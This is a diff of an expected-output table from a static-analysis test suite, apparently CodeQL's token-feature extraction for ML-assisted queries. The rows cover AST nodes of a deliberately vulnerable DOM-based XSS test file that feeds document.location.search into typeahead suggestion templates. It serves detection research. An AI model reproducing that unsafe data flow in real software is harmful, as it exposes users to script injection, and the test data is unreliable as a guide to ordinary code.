templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:29:3 | exceptional return of $('.typ ... }\\n ) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:3:29:3 | exceptional return of $('.typ ... }\\n ) | fileImports | | | autogenerated/Xss/DomBasedXss/typeahead.js:16:5:16:16 | '.typeahead' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/typeahead.js:16:5:16:16 | '.typeahead' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/typeahead.js:16:5:16:16 | '.typeahead' | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | @@ -18146,6 +124810,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/typeahead.js:16:5:16:16 | '.typeahead' | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | | autogenerated/Xss/DomBasedXss/typeahead.js:16:5:16:16 | '.typeahead' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/typeahead.js:16:5:16:16 | '.typeahead' | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:19:16:27 | typeahead | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:19:16:27 | typeahead | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:19:16:27 | typeahead | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:19:16:27 | typeahead | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:16:19:16:27 | typeahead | fileImports | | | autogenerated/Xss/DomBasedXss/typeahead.js:16:29:16:30 | {} | CalleeFlexibleAccessPath | $().typeahead | | autogenerated/Xss/DomBasedXss/typeahead.js:16:29:16:30 | {} | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/typeahead.js:16:29:16:30 | {} | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | @@ -18160,6 +124829,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/typeahead.js:17:5:28:5 | {\\n ... }\\n } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | | autogenerated/Xss/DomBasedXss/typeahead.js:17:5:28:5 | {\\n ... }\\n } | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/typeahead.js:17:5:28:5 | {\\n ... }\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:18:7:18:10 | name | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:18:7:18:10 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:18:7:18:10 | name | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:18:7:18:10 | name | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:18:7:18:10 | name | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:18:7:18:24 | name: 'dashboards' | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:18:7:18:24 | name: 'dashboards' | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:18:7:18:24 | name: 'dashboards' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:18:7:18:24 | name: 'dashboards' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:18:7:18:24 | name: 'dashboards' | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:18:7:18:24 | name: 'dashboards' | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:18:7:18:24 | name: 'dashboards' | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:18:7:18:24 | name: 'dashboards' | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:18:7:18:24 | name: 'dashboards' | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:18:7:18:24 | name: 'dashboards' | fileImports | | | autogenerated/Xss/DomBasedXss/typeahead.js:18:13:18:24 | 'dashboards' | CalleeFlexibleAccessPath | $().typeahead | | autogenerated/Xss/DomBasedXss/typeahead.js:18:13:18:24 | 'dashboards' | InputAccessPathFromCallee | 1.name | | autogenerated/Xss/DomBasedXss/typeahead.js:18:13:18:24 | 'dashboards' | InputArgumentIndex | 1 | @@ -18169,6 +124853,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/typeahead.js:18:13:18:24 | 'dashboards' | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | | autogenerated/Xss/DomBasedXss/typeahead.js:18:13:18:24 | 'dashboards' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/typeahead.js:18:13:18:24 | 'dashboards' | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:7:19:12 | source | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:7:19:12 | source | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:7:19:12 | source | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:7:19:12 | source | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:7:19:12 | source | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:7:22:7 | source: ... } | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:7:22:7 | source: ... } | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:7:22:7 | source: ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:7:22:7 | source: ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:7:22:7 | source: ... } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:7:22:7 | source: ... } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:7:22:7 | source: ... } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:7:22:7 | source: ... } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:7:22:7 | source: ... } | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:7:22:7 | source: ... } | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:19:14 | this | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:19:14 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:19:14 | this | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:19:14 | this | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:19:14 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | 'arguments' object of method source | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | 'arguments' object of method source | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | 'arguments' object of method source | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | 'arguments' object of method source | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | 'arguments' object of method source | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | exceptional return of method source | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | exceptional return of method source | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | exceptional return of method source | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | exceptional return of method source | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | exceptional return of method source | fileImports | | | autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | functio ... } | CalleeFlexibleAccessPath | $().typeahead | | autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | functio ... } | InputAccessPathFromCallee | 1.source | | autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | functio ... } | InputArgumentIndex | 1 | @@ -18178,6 +124892,81 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | functio ... } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | | autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | functio ... } | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | functio ... } | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | return of method source | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | return of method source | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | return of method source | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | return of method source | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:15:22:7 | return of method source | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:25:19:29 | query | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:25:19:29 | query | contextSurroundingFunctionParameters | ()\n(query, cb) | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:25:19:29 | query | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:25:19:29 | query | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:25:19:29 | query | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:32:19:33 | cb | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:32:19:33 | cb | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:32:19:33 | cb | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:32:19:33 | cb | contextSurroundingFunctionParameters | ()\n(query, cb) | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:32:19:33 | cb | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:32:19:33 | cb | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:32:19:33 | cb | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:32:19:33 | cb | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:32:19:33 | cb | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:19:32:19:33 | cb | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:13:20:18 | target | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:13:20:18 | target | contextSurroundingFunctionParameters | ()\n(query, cb) | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:13:20:18 | target | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:13:20:18 | target | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:13:20:18 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:13:20:45 | target | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:13:20:45 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:13:20:45 | target | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:13:20:45 | target | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:13:20:45 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:13:20:45 | target ... .search | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:13:20:45 | target ... .search | contextSurroundingFunctionParameters | ()\n(query, cb) | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:13:20:45 | target ... .search | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:13:20:45 | target ... .search | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:13:20:45 | target ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:22:20:29 | document | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:22:20:29 | document | contextSurroundingFunctionParameters | ()\n(query, cb) | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:22:20:29 | document | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:22:20:29 | document | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:22:20:29 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:22:20:38 | document.location | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:22:20:38 | document.location | contextSurroundingFunctionParameters | ()\n(query, cb) | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:22:20:38 | document.location | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:22:20:38 | document.location | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:22:20:38 | document.location | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:22:20:45 | documen ... .search | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:22:20:45 | documen ... .search | contextSurroundingFunctionParameters | ()\n(query, cb) | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:22:20:45 | documen ... .search | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:22:20:45 | documen ... .search | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:22:20:45 | documen ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:31:20:38 | location | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:31:20:38 | location | contextSurroundingFunctionParameters | ()\n(query, cb) | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:31:20:38 | location | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:31:20:38 | location | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:31:20:38 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:40:20:45 | search | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:40:20:45 | search | contextSurroundingFunctionParameters | ()\n(query, cb) | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:40:20:45 | search | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:40:20:45 | search | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:20:40:20:45 | search | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:21:9:21:10 | cb | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:21:9:21:10 | cb | contextSurroundingFunctionParameters | ()\n(query, cb) | +| autogenerated/Xss/DomBasedXss/typeahead.js:21:9:21:10 | cb | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:21:9:21:10 | cb | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:21:9:21:10 | cb | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:21:9:21:18 | cb(target) | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:21:9:21:18 | cb(target) | contextSurroundingFunctionParameters | ()\n(query, cb) | +| autogenerated/Xss/DomBasedXss/typeahead.js:21:9:21:18 | cb(target) | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:21:9:21:18 | cb(target) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:21:9:21:18 | cb(target) | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:21:9:21:18 | exceptional return of cb(target) | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:21:9:21:18 | exceptional return of cb(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:21:9:21:18 | exceptional return of cb(target) | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:21:9:21:18 | exceptional return of cb(target) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:21:9:21:18 | exceptional return of cb(target) | fileImports | | | autogenerated/Xss/DomBasedXss/typeahead.js:21:12:21:17 | target | CalleeFlexibleAccessPath | cb | | autogenerated/Xss/DomBasedXss/typeahead.js:21:12:21:17 | target | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/typeahead.js:21:12:21:17 | target | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | @@ -18185,6 +124974,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/typeahead.js:21:12:21:17 | target | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | | autogenerated/Xss/DomBasedXss/typeahead.js:21:12:21:17 | target | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/typeahead.js:21:12:21:17 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:23:7:23:15 | templates | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:23:7:23:15 | templates | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:23:7:23:15 | templates | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:23:7:23:15 | templates | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:23:7:23:15 | templates | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:23:7:27:7 | templat ... } | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:23:7:27:7 | templat ... } | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:23:7:27:7 | templat ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:23:7:27:7 | templat ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:23:7:27:7 | templat ... } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:23:7:27:7 | templat ... } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:23:7:27:7 | templat ... } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:23:7:27:7 | templat ... } | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:23:7:27:7 | templat ... } | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:23:7:27:7 | templat ... } | fileImports | | | autogenerated/Xss/DomBasedXss/typeahead.js:23:18:27:7 | {\\n ... } | CalleeFlexibleAccessPath | $().typeahead | | autogenerated/Xss/DomBasedXss/typeahead.js:23:18:27:7 | {\\n ... } | InputAccessPathFromCallee | 1.templates | | autogenerated/Xss/DomBasedXss/typeahead.js:23:18:27:7 | {\\n ... } | InputArgumentIndex | 1 | @@ -18194,6 +124998,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/typeahead.js:23:18:27:7 | {\\n ... } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | | autogenerated/Xss/DomBasedXss/typeahead.js:23:18:27:7 | {\\n ... } | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/typeahead.js:23:18:27:7 | {\\n ... } | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:9:24:18 | suggestion | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:9:24:18 | suggestion | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:9:24:18 | suggestion | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:9:24:18 | suggestion | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:9:24:18 | suggestion | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:9:26:9 | suggest ... } | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:9:26:9 | suggest ... } | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:9:26:9 | suggest ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:9:26:9 | suggest ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:9:26:9 | suggest ... } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:9:26:9 | suggest ... } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:24:9:26:9 | suggest ... } | enclosingFunctionName | | +| 